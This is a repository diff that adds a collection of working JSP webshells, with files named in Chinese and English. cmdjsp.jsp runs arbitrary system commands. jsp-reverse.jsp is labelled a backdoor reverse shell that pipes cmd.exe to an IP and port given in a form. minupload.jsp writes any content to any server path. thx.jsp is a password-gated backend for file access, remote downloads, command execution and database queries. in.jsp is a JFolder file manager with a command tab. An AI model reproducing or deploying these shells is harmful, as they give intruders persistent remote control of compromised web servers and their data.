if (fList[j].isDirectory())
{%>
<a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">删除</a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("不存在或没有权限");
}
%>
&nbsp; </td>
<td colspan="3" valign="top" bgcolor="#999999">
<% try {
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isFile())
{//request.getContextPath()得到虚拟路径%>
<%=fList[j].getName()%>
<a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">编辑</a>
&nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">删除</a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("不存在或没有权限");
}
%>
</td>
</tr>
</table>
<p align="center">Power By 绝对零度[B.C.T] QQ:48124012</p>
<p align="center">&nbsp;</p>
<%}//if edit
}
}
%>
</body>
</html>

31
jsp/hackk8/JSP_66/cmdjsp.jsp Normal file
View file

@ -0,0 +1,31 @@
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>

90
jsp/hackk8/JSP_66/jsp-reverse.jsp Normal file
View file

@ -0,0 +1,90 @@
// backdoor.jsp
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>

48
jsp/hackk8/JSP_66/minupload.jsp Normal file
View file

@ -0,0 +1,48 @@
<%@page contentType="text/html;charset=utf-8"%>
<%@page import="java.io.*,java.util.*,java.net.*"%>
<html>
<head>
<title>JspDo Code By Xiao.3</title>
<style type="text/css">
body { color:red; font-size:12px; background-color:white; }
</style>
</head>
<body>
<%
if(request.getParameter("context")!=null)
{ //这小马有问题 上传jsp就出错
String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"utf-8");
String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"utf-8");
OutputStream pt = null;
try {
pt = new FileOutputStream(path);
pt.write(context.getBytes());
out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='点击可以转到上传的文件页面!'>上传成功!</font></a>");
} catch (FileNotFoundException ex2) {
out.println("<font color='red'>上传失败!</font>");
} catch (IOException ex) {
out.println("<font color='red'>上传失败!</font>");
} finally {
try {
pt.close();
} catch (IOException ex3) {
out.println("<font color='red'>上传失败!</font>");
}
}
}
%>
<form name="frmUpload" method="post" action="">
<font color="blue">本文件的路径:</font><%out.print(request.getRealPath(request.getServletPath())); %>
<br>
<br>
<font color="blue">上传文件路径:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")+"\k8cmd.jsp"); %>">
<br>
<br>
上传文件内容:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea>
<br>
<br>
<input type="submit" name="btnSubmit" value="Upload">
</form>
</body>
</html>

1913
jsp/hackk8/JSP_66/other/download.jsp Normal file
View file

File diff suppressed because it is too large Load diff

2329
jsp/hackk8/JSP_66/other/jspspy.jsp Normal file
View file

File diff suppressed because it is too large Load diff

2323
jsp/hackk8/JSP_66/other/jspspy_k8.jsp Normal file
View file

File diff suppressed because it is too large Load diff

59
jsp/hackk8/JSP_66/other/thx.jsp Normal file
View file

@ -0,0 +1,59 @@
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
String Pwd="xc";
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
%><%
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
%>

1022
jsp/hackk8/fuck-jsp/JFolder.jsp Normal file
View file

File diff suppressed because it is too large Load diff

2403
jsp/hackk8/fuck-jsp/JspSpyJDK5.jsp Normal file
View file

File diff suppressed because it is too large Load diff

982
jsp/hackk8/fuck-jsp/in.jsp Normal file
View file

@ -0,0 +1,982 @@
<%
/**
xxxxxxxxxxxx xxxxxxxxxxxxxxxx
@xxxxxxxxx JFolder.jsp
@Description x。
@Author Steven Cee
@Email xxxx@Gmail.com
@Bugs : 下载时,中文文件名无法正常显示
*/
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //语言版本0 : 中文; 1英文
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> </font>"," <font color=red> </font>"};
String[] strFileManage = {"文 件 管 理","File Management"};
String[] strCommand = {"CMD 命 令","Command Window"};
String[] strSysProperty = {"","System Property"};
String[] strHelp = {"","Help"};
String[] strParentFolder = {"上级目录","Parent Folder"};
String[] strCurrentFolder= {"当前目录","Current Folder"};
String[] strDrivers = {"驱动器","Drivers"};
String[] strFileName = {"文件名称","File Name"};
String[] strFileSize = {"文件大小","File Size"};
String[] strLastModified = {"最后修改","Last Modified"};
String[] strFileOperation= {"文件操作","Operations"};
String[] strFileEdit = {"修改","Edit"};
String[] strFileDown = {"下载","Download"};
String[] strFileCopy = {"复制","Move"};
String[] strFileDel = {"删除","Delete"};
String[] strExecute = {"执行","Execute"};
String[] strBack = {"返回","Back"};
String[] strFileSave = {"保存","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
/**
Windows系统上取得可用的所有逻辑盘
*/
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
//bug 5.09M 显示5.9M
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("文件大小为 0 字节,就不用下了吧");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("原始文件: "+strPath+"<p>");
sbCopy.append("目标文件: <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("原始文件 "+strPath+"<p>");
sbSaveCopy.append("目标文件 "+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>复制成功!</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" 文件创建失败");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" 目录创建失败");
}
else
{
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html>
<head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
////////Stop editting////////////////
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
